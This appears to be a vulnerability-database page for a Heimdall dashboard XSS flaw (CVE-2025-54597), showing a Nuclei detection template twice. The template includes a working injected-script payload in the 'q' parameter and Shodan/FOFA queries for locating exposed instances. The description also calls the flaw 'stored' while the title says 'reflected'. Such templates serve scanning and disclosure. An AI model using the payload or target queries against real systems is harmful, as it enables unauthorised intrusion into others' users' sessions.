Heimdall Application Dashboard < 2.7.3 - Reflected XSS

CVE-2025-54597

Verified

Description

LinuxServer.io Heimdall < 2.7.3 contains a stored XSS caused by improper sanitization of the \"q\" parameter, letting remote attackers execute scripts, exploit requires crafted input.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

heimdall

Published Date

March 31, 2026

Template Author

0x_akoko

CVE-2025-54597.yaml

id: CVE-2025-54597

info:
  name: Heimdall Application Dashboard < 2.7.3 - Reflected XSS
  author: 0x_Akoko
  severity: medium
  description: |
    LinuxServer.io Heimdall < 2.7.3 contains a stored XSS caused by improper sanitization of the \"q\" parameter, letting remote attackers execute scripts, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary scripts in users' browsers, potentially stealing session data or performing actions on behalf of users.
  remediation: |
    Update to version 2.7.3 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54597
    - https://github.com/linuxserver/Heimdall/releases/tag/v2.7.3
    - https://github.com/linuxserver/Heimdall/commit/6b9f61b0e672c37b807ff338e1a3fdaa8f39a8a6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-54597
    epss-score: 0.00728
    epss-percentile: 0.72837
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: linuxserver
    product: heimdall
    shodan-query: title:"Heimdall"
    fofa-query: app="Heimdall-Application-Dashboard"
  tags: cve,cve2025,heimdall,xss,reflected,linuxserver,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "heimdall"
          - "items/pintoggle"
        internal: true

  - raw:
      - |
        GET /?q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><img src=x onerror=alert(document.domain)>'
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bd42139a0846715bad1212ca769c52bc3bbc91362b7774fb7c0b469d7b812db4022017172484410f71688932e2458d8574db69efd6728a6598dcd13f43fd85137864:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2025-54597

CWE ID:

cwe-79

References

https://nvd.nist.gov/vuln/detail/CVE-2025-54597 https://github.com/linuxserver/Heimdall/releases/tag/v2.7.3 https://github.com/linuxserver/Heimdall/commit/6b9f61b0e672c37b807ff338e1a3fdaa8f39a8a6

Remediation Steps

Update to version 2.7.3 or later.

id: CVE-2025-54597

info:
  name: Heimdall Application Dashboard < 2.7.3 - Reflected XSS
  author: 0x_Akoko
  severity: medium
  description: |
    LinuxServer.io Heimdall < 2.7.3 contains a stored XSS caused by improper sanitization of the \"q\" parameter, letting remote attackers execute scripts, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary scripts in users' browsers, potentially stealing session data or performing actions on behalf of users.
  remediation: |
    Update to version 2.7.3 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54597
    - https://github.com/linuxserver/Heimdall/releases/tag/v2.7.3
    - https://github.com/linuxserver/Heimdall/commit/6b9f61b0e672c37b807ff338e1a3fdaa8f39a8a6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-54597
    epss-score: 0.00728
    epss-percentile: 0.72837
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: linuxserver
    product: heimdall
    shodan-query: title:"Heimdall"
    fofa-query: app="Heimdall-Application-Dashboard"
  tags: cve,cve2025,heimdall,xss,reflected,linuxserver,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "heimdall"
          - "items/pintoggle"
        internal: true

  - raw:
      - |
        GET /?q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><img src=x onerror=alert(document.domain)>'
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bd42139a0846715bad1212ca769c52bc3bbc91362b7774fb7c0b469d7b812db4022017172484410f71688932e2458d8574db69efd6728a6598dcd13f43fd85137864:922c64590222798bb761d5b6d8e72950

Heimdall Application Dashboard < 2.7.3 - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Heimdall Application Dashboard < 2.7.3 - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps